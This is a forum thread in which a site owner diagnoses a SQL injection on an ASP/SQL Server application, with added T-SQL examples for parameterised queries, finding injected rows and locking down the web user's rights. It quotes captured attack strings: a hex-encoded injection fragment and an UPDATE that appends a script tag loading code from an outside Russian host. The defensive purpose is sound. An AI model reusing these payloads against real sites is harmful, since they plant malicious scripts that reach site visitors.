Does this look like a SQL injection attack?

  • John: wide post dude! 😀

    Casa51: My Assumptions:

    1. Your database is accessed by a web application.

    2. You take user input via the web application and insert it into your database.

    This implies that your web pages which accept input have 'bad' code in them for updating the database.

    To fix this you need to parse, type and truncate the input to the expected size and allowed values, i.e. remove all of the things you believe are illegal characters before posting it to your database.

    Just out of interest in which programming language is your web app built in?

    --Shaun

    Hiding under a desk from SSIS Implementation Work :crazy:
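The "parse, type and truncate" advice above in working T-SQL, as an added example that is not part of the thread: it rebuilds the thread's `Select sectionID, heading from ordered where virtualSectionID_p = '...'` query on a throwaway temp table with constructed data, first the way string concatenation assembles it (the shape seen in the profiler capture later in the thread) and then with the value bound as a typed parameter through `sp_executesql`. The temp table, its rows and the sample input are constructed; only the column and table names come from the thread. Written for SQL Server 2005 and later (no DECLARE initialisers).

```sql
-- Added example, not from the thread: vulnerable concatenation vs. a bound parameter.
CREATE TABLE #ordered (
    sectionID          INT          NOT NULL,
    virtualSectionID_p VARCHAR(20)  NOT NULL,
    heading            VARCHAR(200) NOT NULL
);
INSERT INTO #ordered (sectionID, virtualSectionID_p, heading)
VALUES (1, '003', 'Constructed heading');

-- Constructed input shaped like the profiler capture: a valid id, a closing quote,
-- a statement terminator, then an extra statement (a harmless SELECT here).
DECLARE @input VARCHAR(200);
SET @input = '003'';SELECT ''second statement ran'' AS injected --';

-- 1. Vulnerable: the request value is glued into the SQL text.
DECLARE @sql NVARCHAR(4000);
SET @sql = N'SELECT sectionID, heading FROM #ordered WHERE virtualSectionID_p = '''
         + @input + N'''';
PRINT @sql;   -- the quote closes early; everything after ';' is a second statement
EXEC (@sql);  -- two result sets: the '003' row, then the injected SELECT

-- 2. Hardened: same query, value bound as a parameter. The whole string is
--    compared as data, so no row matches and nothing else executes.
EXEC sp_executesql
    N'SELECT sectionID, heading FROM #ordered WHERE virtualSectionID_p = @id',
    N'@id VARCHAR(200)',
    @id = @input;

-- 3. Typed: when the key is really a number, bind it as INT. The application
--    converts the request value first and rejects anything that fails, so a
--    string like @input never reaches the database at all.
DECLARE @idInt INT;
SET @idInt = 3;  -- what a successful CONVERT of '003' yields
EXEC sp_executesql
    N'SELECT sectionID, heading FROM #ordered WHERE CONVERT(INT, virtualSectionID_p) = @id',
    N'@id INT',
    @id = @idInt;

DROP TABLE #ordered;
```

Run it in SSMS with Results to Text to see step 1 return two result sets and step 2 return none; the `PRINT` shows exactly what the server received in the vulnerable case. In classic ASP the same binding is done with `ADODB.Command` and `CreateParameter` rather than building the string by hand.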

  • What kind of Rights does the Web Application User have? Check the rights of the user and remove access to objects that are not needed.

    -Roy

  • Sorry 😀

  • When you run the profiler how are you seeing the entire string.

    Select sectionID, heading from ordered where virtualSectionID_p =

    '003;DECLARE @s-2 VARCHAR(4000);SET @s-2=CAST(0x4445434C415...'

    I might just run a profiler here to see - what options did you use for the profiler.

    What happens if you're not having profiler run all the time? Then you'll never know, hmm.

    Now for the web user login (what rights do you disable? I got a bit lost on the thread).

  • You can deny all on any tables that you want for that user.

    For example if Test is the web user, then you can do a

    deny all on sysobjects to test

    That will make sure that the user Test cannot select from sysobjects table. Please be careful when you revoke grant permissions to system tables.

    -Roy

  • Is this for all the databases or just the one particular database.

    deny all on sysobjects to test

    How do you do this in the GUI, or at least see it denied for the user?

    That is for that particular DB. You can try to login with the user and do a select on sysobjects. You will see an access denied.

    -Roy

  • be back !

    thanks for all

    1 - i use asp 3.0 for dev

    2 - i create one user for my database

    ( database ISLE : USER ISLEU)

    3 - in SECURITY /user repertory of ISLE DATABASE they have

    - guest

    - dbo

    - INFORMATION_SCHEMA

    - ISLEU

    - sys

    4 - USERU has select, connect, update, delete, insert on database

    where can I see if USERU has sys table authorisation?

    must I create a specific connection for my back office

    with (DELETE, update.....)

    and another for my front office with only connect?

    in sql profiler i see

    UPDATE [CALENDRIER] SET [TITREDATE]=RTRIM(CONVERT(VARCHAR(4000),[TITREDATE]))+' script src=http://www.4net9.ru/script.js /script '

    but in IIS log nothing !!!

    where did the attack send this request?

    it's not a query string because URLScan stops it.

    thanks
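The `UPDATE [CALENDRIER] SET [TITREDATE]=RTRIM(CONVERT(VARCHAR(4000),[TITREDATE]))+' script src=...'` capture shows the attacker appending the same fragment to character columns. Before cleaning anything you want to know which tables and columns were hit and how many rows. The following T-SQL is an added example, not from the thread: it walks every character column of every user table in the current database and counts the rows containing a marker string. The marker value `script src=` is a constructed search term taken from the shape of the capture; adjust it to the exact text in your own data. Identifiers go through `QUOTENAME` and the marker is a bound parameter, so the scan does not itself build injectable SQL. SQL Server 2005 and later.

```sql
-- Added example, not from the thread: locate columns carrying an injected fragment.
SET NOCOUNT ON;

DECLARE @marker NVARCHAR(100);
SET @marker = N'script src=';   -- constructed marker; replace with the exact text seen

CREATE TABLE #hits (
    schemaName SYSNAME,
    tableName  SYSNAME,
    columnName SYSNAME,
    rowsHit    INT
);

DECLARE @schema SYSNAME, @table SYSNAME, @column SYSNAME, @sql NVARCHAR(MAX);

-- Only user tables, and only columns that can hold the injected text.
DECLARE colCursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT s.name, t.name, c.name
    FROM sys.columns c
    JOIN sys.tables  t  ON t.object_id     = c.object_id
    JOIN sys.schemas s  ON s.schema_id     = t.schema_id
    JOIN sys.types   ty ON ty.user_type_id = c.user_type_id
    WHERE ty.name IN ('varchar', 'nvarchar', 'char', 'nchar')
      AND t.is_ms_shipped = 0;

OPEN colCursor;
FETCH NEXT FROM colCursor INTO @schema, @table, @column;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Table and column names are quoted; the marker is passed as a parameter.
    SET @sql = N'INSERT INTO #hits (schemaName, tableName, columnName, rowsHit) '
             + N'SELECT @s, @t, @c, COUNT(*) FROM '
             + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' WHERE ' + QUOTENAME(@column) + N' LIKE ''%'' + @m + ''%''';
    EXEC sp_executesql @sql,
         N'@s SYSNAME, @t SYSNAME, @c SYSNAME, @m NVARCHAR(100)',
         @s = @schema, @t = @table, @c = @column, @m = @marker;
    FETCH NEXT FROM colCursor INTO @schema, @table, @column;
END
CLOSE colCursor;
DEALLOCATE colCursor;

-- Report only the columns that actually contain the marker.
SELECT schemaName, tableName, columnName, rowsHit
FROM #hits
WHERE rowsHit > 0
ORDER BY rowsHit DESC;

DROP TABLE #hits;
```

The output is the list of columns to restore from a pre-incident backup or, where no backup exists, to clean with a per-column `UPDATE ... SET col = REPLACE(col, '<fragment>', '')` once the exact appended fragment is known. The same scan run again afterwards, and scheduled while the web application is still exposed, is a cheap check that the payload has not been written back.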

  • I do not think that it came in as query string. If the page has Input Boxes where customer/user can enter values, then it must have come through there.

    I really do not think that it is a good idea to give Select, Update, Insert and delete operation to the web user for the Database.

    You can just connect to the SSMS using the web user and run the query select * from sysobjects. If it gives you rows, then it has permission. You can just revoke the Permission.

    If I were in your place, I would ask the programmers to make stored procs for all DML that is called from Web app and revoke all grants to the tables in your DB. Just my 2 cents

    -Roy

  • ok thanks

  • Denying/Revoking rights to users/logins on objects is the way to go, but any rights granted to the public role will override the deny/revoke on the user as everybody has this role by default.

    Also your web app user that access the database should never have the dbowner role.

    Hiding under a desk from SSIS Implementation Work :crazy:
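Roy's advice (check what the web user can reach, revoke the table grants, call stored procedures instead) and Shaun's two points (grants to `public` reach every user, the web user must not be in `db_owner`) as one T-SQL script. This is an added example, not from the thread: the database `ISLE` and user `ISLEU` are the thread's names, while the `ordered` table being in `dbo`, the procedure `dbo.GetSection` and the database-scoped grants being the ones described in the thread are assumptions. It runs as a database owner or sysadmin in SSMS on SQL Server 2005 and later; `EXECUTE AS USER` lets you test the web user's effective rights without knowing its password.

```sql
-- Added example, not from the thread: audit the web user, then rebuild it on least privilege.
USE ISLE;
GO

-- 1. Explicit permissions held by the web user and by public. Every database
--    user is a member of public, so anything granted there reaches ISLEU too.
SELECT pr.name AS principal, pe.state_desc, pe.permission_name,
       pe.class_desc, OBJECT_NAME(pe.major_id) AS object_name
FROM sys.database_permissions pe
JOIN sys.database_principals pr ON pr.principal_id = pe.grantee_principal_id
WHERE pr.name IN ('ISLEU', 'public')
ORDER BY pr.name, pe.permission_name;

-- 2. Role membership. db_owner (or any fixed role the app does not need)
--    should not appear here for the web user.
SELECT r.name AS role_name, m.name AS member_name
FROM sys.database_role_members rm
JOIN sys.database_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.database_principals m ON m.principal_id = rm.member_principal_id
WHERE m.name = 'ISLEU';

-- 3. Effective access as the web user. Catalog views only show objects the
--    caller has some permission on, so the count shrinks as rights are removed.
EXECUTE AS USER = 'ISLEU';
SELECT COUNT(*) AS visible_objects FROM sys.objects;
SELECT HAS_PERMS_BY_NAME('dbo.ordered', 'OBJECT', 'SELECT') AS can_read_ordered,
       HAS_PERMS_BY_NAME('dbo.ordered', 'OBJECT', 'UPDATE') AS can_update_ordered;
REVERT;
GO

-- 4. Least privilege: remove the database-scoped DML grants the thread
--    describes (repeat per table with ON <table> for table-scoped grants),
--    then expose the one query through a procedure with a typed parameter.
REVOKE SELECT, INSERT, UPDATE, DELETE FROM ISLEU;
GO
CREATE PROCEDURE dbo.GetSection
    @id VARCHAR(20)
AS
    SET NOCOUNT ON;
    SELECT sectionID, heading FROM dbo.ordered WHERE virtualSectionID_p = @id;
GO
GRANT EXECUTE ON dbo.GetSection TO ISLEU;
GO

-- 5. Re-check: the procedure works for the web user, direct table access does not.
EXECUTE AS USER = 'ISLEU';
EXEC dbo.GetSection @id = '003';                                             -- rows
SELECT HAS_PERMS_BY_NAME('dbo.ordered', 'OBJECT', 'SELECT') AS can_read_ordered;  -- 0
REVERT;
GO
```

Step 1 is what tells you whether `public` hands a right back after you revoke it from the user; a `REVOKE` only removes that user's own grant, whereas a `DENY` on the user wins over any `GRANT`, including one made to `public`. Step 5 is the same test Roy describes ("login with the user and do a select"), done by impersonation so it can be scripted and repeated after every permission change.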

  • YEAHHHHHHHHHHHHHHHHHHHHHHHHHHHH

    thanks for all i found the error

    my mistake was to transfer the db from the 2000 to the 2005 server; I used my data save tool "Retrospect"

    and it gave a wrong user authorization!

    I tried to connect with the web user to my database and I could look at all tables and all system databases!!!

    I just deleted the connection and rebuilt it and all is good!!!!

    THANKS for all
